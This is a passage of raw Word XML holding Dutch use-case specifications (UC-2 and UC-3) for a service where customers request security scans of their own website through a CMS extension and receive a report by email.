                            </w:r>
                          </w:p>
                          <w:p w14:paraId="46721758" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="23"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De klant krijgt een mail met de bevestiging dat de aanvraag succesvol was en dat de scan zal worden uitgevoerd</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="21F66BA1" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00257D6A">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Succes Scenario</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="058BBF1B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="24"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De klant opent het aanvraagformulier</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D2F2A73" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="24"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het CMS toont het aanvraagformulier</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="757C6E18" w14:textId="0AC5C227" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="24"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De klant vult het aanvraagformulier in met de scope van de URL, e-mailadres en type scan vervolgens drukt de klant op verzenden</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="41987346" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="24"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het CMS gebruikt de API om het formulier te verwerken in een opdracht en verstuurd het naar de server</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="108B1548" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="24"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem valideert en verwerkt de aanvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="42BC1E42" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="24"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem stuur een email naar de klant met het bericht dat de aanvraag van een scan succesvol is verlopen</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="45E19F2C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="006A624E" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Extensie 2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="006A624E">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>.3a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BA4229D" w14:textId="460F8CED" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>3a – Foutieve waarde(s) ingevuld</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="62D0D3C0" w14:textId="6CEC379B" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="25"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem geeft aan dat de klant een incorrecte waarde(s) heeft ingevuld</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5FD4742C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="25"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Het systeem stuurt het formulier niet </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="00584A31" w14:textId="0D2DA88F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="25"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De klant mag het nogmaals proberen</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5622DA52" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="002D13CB" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Extensie 2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002D13CB">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>.5a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="121E4F30" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>5a – Verwerking van de aanvraag gaat fout</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2FD0ACAB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="26"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem stuurt een email naar de klant toe om te vermelden dat de aanvraag mislukt is</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="737CF9DB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="26"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem verzoek de klant om het nogmaals te proberen, als het dan nog steeds niet lukt de administrator te contacteren (Telefoonnummer wordt meegegeven)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C8A2951" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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E43B1" id="_x0000_s1124" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:1.3pt;width:451.5pt;height:613.05pt;z-index:251869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3t7dD8CAAByBAAADgAAAGRycy9lMm9Eb2MueG1srFTbbtswDH0fsH8Q9L7ayeIlMeoUXbsOA7oL&#10;0O4DaFmOhUqiJymxu68vJadpur0NexFEkT4kzyF9fjEazfbSeYW24rOznDNpBTbKbiv+8/7m3Yoz&#10;H8A2oNHKij9Kzy82b9+cD30p59ihbqRjBGJ9OfQV70LoyyzzopMG/Bn20pKzRWcgkOm2WeNgIHSj&#10;s3mef8gGdE3vUEjv6fV6cvJNwm9bKcL3tvUyMF1xqi2k06Wzjme2OYdy66DvlDiUAf9QhQFlKekR&#10;6hoCsJ1Tf0EZJRx6bMOZQJNh2yohUw/UzSz/o5u7DnqZeiFyfH+kyf8/WPFt/8Mx1VR8sV5wZsGQ&#10;SPfywYc9PLB55GfofUlhdz0FhvEjjqRz6tX3tygePLN41YHdykvncOgkNFTfLH6ZnXw64fgIUg9f&#10;saE0sAuYgMbWmUge0cEInXR6PGojx8AEPRbL94u8IJcg33K5IrtIOaB8/rx3PnyWaFi8VNyR+Ake&#10;9rc+xHKgfA6J2Txq1dworZMRB05eacf2QKNSb6cW9c5QrdPbusjzNDCEk+YzhifUV0jasqHi62Je&#10;TCS9yuK29TEHoZ0AnoYZFWgptDIVXx2DoIzUfrJNGtkASk93qkbbA9eR3onoMNZjknWdlIhC1Ng8&#10;EvsOpyWgpaVLh+43ZwMtQMX9rx04yZn+YknB9WyxiBuTjEWxnJPhTj31qQesIKiKB86m61VIWxa5&#10;tXhJSrcqafBSyaFmGuxE4mEJ4+ac2inq5VexeQIAAP//AwBQSwMEFAAGAAgAAAAhAJPSoeffAAAA&#10;CgEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZwVu7SYQ0jdkUUbwURGz14G2TnSbB&#10;7GzY3bTx3zue9Di8j/e+qXaLHcUZfRgcKUjXCQik1pmBOgXvx+dVASJETUaPjlDBNwbY1ddXlS6N&#10;u9Abng+xE1xCodQK+hinUsrQ9mh1WLsJibOT81ZHPn0njdcXLrejzJIkl1YPxAu9nvCxx/brMFsF&#10;9qWh/SftnTHz0T/F/PUDtyelbm+Wh3sQEZf4B8OvPqtDzU6Nm8kEMSpYpemGUQVZDoLzYpvegWgY&#10;zLJiA7Ku5P8X6h8AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAA&#10;AAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAC3t7dD8CAAByBAAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAk9Kh598AAAAKAQAA&#10;DwAAAAAAAAAAAAAAAACXBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKMFAAAAAA==&#10;" fillcolor="#f2f2f2 [3052]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5766A7E9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00A97198" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>UC-2: Aanvraag scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="184473C2" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t xml:space="preserve">De klant vraagt een scan aan via de </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>CMS extensie</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t>. Dit wordt gedaan doormiddel van het invullen van een online formulier.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1519925A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00C34CD5">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Acteurs</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="11103501" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00C34CD5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Klant, API</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00C34CD5">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve">  </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="35CE2495" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00A97198" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Preconditie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="405E2AF7" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="22"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">De klant heeft de </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>CMS extensie</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> geïnstalleerd</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="77A32077" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="22"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De klant heeft zich geregistreerd</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="48217429" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00834F03" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00834F03">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Postconditie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="46721758" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="23"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De klant krijgt een mail met de bevestiging dat de aanvraag succesvol was en dat de scan zal worden uitgevoerd</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="21F66BA1" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00257D6A">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Succes Scenario</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="058BBF1B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="24"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De klant opent het aanvraagformulier</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5D2F2A73" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="24"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het CMS toont het aanvraagformulier</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="757C6E18" w14:textId="0AC5C227" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="24"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De klant vult het aanvraagformulier in met de scope van de URL, e-mailadres en type scan vervolgens drukt de klant op verzenden</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="41987346" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="24"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het CMS gebruikt de API om het formulier te verwerken in een opdracht en verstuurd het naar de server</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="108B1548" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="24"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem valideert en verwerkt de aanvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="42BC1E42" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="24"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem stuur een email naar de klant met het bericht dat de aanvraag van een scan succesvol is verlopen</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="45E19F2C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="006A624E" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Extensie 2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="006A624E">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>.3a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BA4229D" w14:textId="460F8CED" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>3a – Foutieve waarde(s) ingevuld</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="62D0D3C0" w14:textId="6CEC379B" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="25"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem geeft aan dat de klant een incorrecte waarde(s) heeft ingevuld</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5FD4742C" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="25"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Het systeem stuurt het formulier niet </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="00584A31" w14:textId="0D2DA88F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="25"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De klant mag het nogmaals proberen</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5622DA52" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="002D13CB" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Extensie 2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002D13CB">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>.5a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="121E4F30" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>5a – Verwerking van de aanvraag gaat fout</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2FD0ACAB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="26"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem stuurt een email naar de klant toe om te vermelden dat de aanvraag mislukt is</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="737CF9DB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="26"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem verzoek de klant om het nogmaals te proberen, als het dan nog steeds niet lukt de administrator te contacteren (Telefoonnummer wordt meegegeven)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C8A2951" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0061509C">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B46AED" w14:textId="77777777" w:rsidR="00E424FE" w:rsidRDefault="0061509C">
      <w:pPr>
        <w:sectPr w:rsidR="00E424FE" w:rsidSect="00BD01D5">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251871232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="526F5EAF" wp14:editId="15902E7A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-11430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>31115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5743575" cy="8839200"/>
                <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="49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8839200"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="95000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4ABFD196" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>UC-3</w:t>
                            </w:r>
                            <w:r w:rsidRPr="003B4D3F">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>: Voert scan opdracht uit</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3BD856E9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>De API geeft de opdracht aan de Terminal om een scan opdracht uit te voeren op verzoek van de klant.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="758B064D" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00CF63E0" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Acteur</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="717DBA1F" w14:textId="06A890EA" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>API</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7F5A24BA" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00817940">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Preconditie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4040024F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="27"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De klant heeft een aanvraag gedaan voor een scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="72A56B96" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="27"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De aanvraag is goedgekeurd door het systeem</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4F1D3FFE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="004C5131" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004C5131">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Postconditie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="302CDFB2" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="28"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De scan is succesvol uitgevoerd. Er is een rapport gegenereerd, deze is succesvol verzonden naar de klant toe</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="448E8322" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00637DFA" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00637DFA">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Succes Scenario</w:t>
                            </w:r>
                          </w:p>
